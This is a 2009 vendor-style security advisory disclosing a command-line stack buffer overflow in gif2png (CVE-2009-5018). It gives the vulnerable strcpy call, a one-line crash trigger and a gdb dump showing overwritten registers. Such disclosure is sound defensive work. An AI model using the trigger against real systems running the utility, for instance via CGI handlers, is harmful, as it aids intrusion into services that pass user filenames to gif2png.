POSTED BY: Patroklos Argyroudis / 14.10.2009

gif2png command line buffer overflow

CENSUS ID:CENSUS-2009-0006
CVE ID:CVE-2009-5018
Affected Products:gif2png versions ≤ 2.5.1.
Class:Improper Input Validation (CWE-20), Failure to Constrain Operations within the Bounds of a Memory Buffer (CWE-119)
Remote:Yes (when gif2png is used by CGI programs)
Discovered by:Patroklos Argyroudis

We have discovered an “improper input validation” vulnerability in the gif2png utility that leads to a stack buffer overflow.

Details

gif2png is a utility that converts files from the Graphic Interchange Format (GIF) to Portable Network Graphics (PNG).

gif2png (up to and including version 2.5.1) is prone to a command line buffer overflow since there is an strcpy(3) call that fails to bounds-check user-supplied data before copying them to a fixed size buffer. Here is a transcript of triggering the bug:

[argp@hegel /tmp]$ gif2png `python -c 'print "A"*2048'`
Segmentation fault (core dumped)
[argp@hegel /tmp]$ gdb -q gif2png -c core
(no debugging symbols found)

warning: Can't read pathname for load map: Input/output error.
Reading symbols from /usr/lib/libpng12.so.0...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/libpng12.so.0
Reading symbols from /lib/i686/cmov/libm.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/i686/cmov/libm.so.6
Reading symbols from /usr/lib/libz.so.1...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/libz.so.1
Reading symbols from /lib/i686/cmov/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/i686/cmov/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
(no debugging symbols found)
Core was generated by
`AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0  0xb7e6c6ed in ?? () from /lib/i686/cmov/libc.so.6
gdb $ i r
eax            0x41414141   0x41414141
ecx            0xb7f5960c   0xb7f5960c
edx            0xbfffe960   0xbfffe960
ebx            0xb7f57ff4   0xb7f57ff4
esp            0xbfffe384   0xbfffe384
ebp            0xbfffe3d8   0xbfffe3d8
esi            0xb7f3b1da   0xb7f3b1da
edi            0xb7f3b1e4   0xb7f3b1e4
eip            0xb7e6c6ed   0xb7e6c6ed
eflags         0x10206  [ PF IF RF ]
cs             0x73 0x73
ss             0x7b 0x7b
ds             0x7b 0x7b
es             0x7b 0x7b
fs             0x0  0x0
gs             0x33 0x33

The bug is located at file gif2png.c, line number 901, strcpy(name, argv[i]), where name is a fixed size char array.

This may have security repercussions if gif2png is configured as a handler for other applications that can pass user-supplied filenames as command line input to gif2png (e.g. from a CGI or other).